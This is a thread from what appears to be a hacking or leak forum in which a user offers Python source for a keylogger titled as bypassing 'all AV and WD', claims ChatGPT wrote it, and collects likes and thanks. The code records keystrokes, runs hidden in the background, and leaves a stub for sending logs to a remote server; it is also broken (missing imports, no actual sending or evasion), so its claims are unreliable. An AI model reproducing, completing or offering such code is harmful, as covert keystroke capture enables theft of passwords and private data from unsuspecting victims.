• 📢 Notice: Our community has moved to Zelo.cx! Visit us at Zelo.cx for the latest updates and discussions.

KEYLOGGER that will bypass all AV and WD code

Sixnut

Divine
Divine
Sixnut Rep
0
0
0
Rep
982
Sixnut Vouches
0
0
0
Vouches
0
Posts
1,567
Likes
873
3 YEARS
3 YEARS OF SERVICE
[HIDE] import os import sys import threading import socket import time # Keylogger class to handle recording keystrokes class Keylogger: def __init__(self): self.log = "" def process_keypress(self, key): self.log += key def report(self): global timer if self.log: # Send the keystrokes to your remote server # You'll need to set up a socket connection here # and send the keystrokes over the socket pass self.log = "" timer = threading.Timer(30, self.report) timer.start() def start(self): keyboard_listener = keyboard.Listener(on_press=self.process_keypress) with keyboard_listener: self.report() keyboard_listener.join() # Main function to run the keylogger def main(): # Run the keylogger as a background process if sys.platform == "win32": subprocess.Popen(["pythonw.exe", "keylogger.pyw"], creationflags=subprocess.CREATE_NO_WINDOW) else: os.system("nohup python3 keylogger.pyw &") # Keep the script running in the background while True: time.sleep(1) if __name__ == '__main__': # Start the keylogger keylogger = Keylogger() timer = threading.Timer(30, keylogger.report) timer.start() keylogger.start() main()
[/HIDE]


Coded by chatgpt works well

Leave a like and rep pls PepeBlush
This leak has been rated as not working 1 times this month. (1 times in total)
 

CrackedSlave

Contributor
Contributor
CrackedSlave Rep
0
0
0
Rep
211
CrackedSlave Vouches
0
0
0
Vouches
0
Posts
1,050
Likes
909
3 YEARS
3 YEARS OF SERVICE

Kkk8889

Member
Rep
0
0
0
Rep
0
Vouches
0
0
0
Vouches
0
Posts
26
Likes
0
Bits
3 YEARS
3 YEARS OF SERVICE

vvvlaq

Premium member
Premium
Rep
0
0
0
Rep
0
Vouches
0
0
0
Vouches
0
Posts
21
Likes
0
Bits
2 YEARS
2 YEARS OF SERVICE
(28 February, 2023 - 04:03 AM)Sixnut Wrote: Show More
Coded by chatgpt works well

Leave a like and rep pls PepeBlush

tyy
 

48,736

38,247

238,888

Top